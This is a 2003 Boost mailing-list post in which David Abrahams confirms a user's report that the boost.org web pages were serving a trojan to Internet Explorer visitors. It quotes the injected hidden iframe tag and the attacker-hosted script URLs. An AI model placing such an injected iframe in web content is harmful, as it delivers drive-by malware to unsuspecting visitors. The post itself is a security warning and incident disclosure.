Boost :

From: David Abrahams (dave_at_[hidden])
Date: 2003-07-28 16:44:43

• Next message: Brock Peabody: "RE: [boost] RE: Re: Re: GUI/GDI template library"
• Previous message: E. Gladyshev: "Re: [boost] Re: Re: Re: GUI/GDI template library"
• Next in thread: Beman Dawes: "Re: [boost] Trojan Horse Warning"
• Reply: Beman Dawes: "Re: [boost] Trojan Horse Warning"

I have confirmed that the problem reported below is occurring: Please
take extreme care in using the Boost website until we've corrected it.
The web pages are unmodified on the server itself, so we have to wait
for Beman to contact the ISP.

Sorry,
Dave

----
From: turbotrup256 <be3d_at_[hidden]>
Subject: malicious content on www.boost.org
To: Boost-Users_at_[hidden]
Date: Mon, 28 Jul 2003 15:31:29 -0400
Hello,
The www.boost.org site is currently spreading some trojan among MS IE 
clients.
All html pages have the following tag appended:
iframe src=http://216.247.117.114/inf.html  width=0 height=0 
frameborder=0 marginwidth=0 marginheight=0
This leads to a cgi script:
http://216.247.117.114/cgi-bin/readme.pl
which does exploit some *very bad* IE vulnerability, and 
runs some executable code, as far as I can see "AICORE" trojan 
carrying something else.
Please forgive me this obviously OT post. :)
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com

• Next message: Brock Peabody: "RE: [boost] RE: Re: Re: GUI/GDI template library"
• Previous message: E. Gladyshev: "Re: [boost] Re: Re: Re: GUI/GDI template library"
• Next in thread: Beman Dawes: "Re: [boost] Trojan Horse Warning"
• Reply: Beman Dawes: "Re: [boost] Trojan Horse Warning"

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk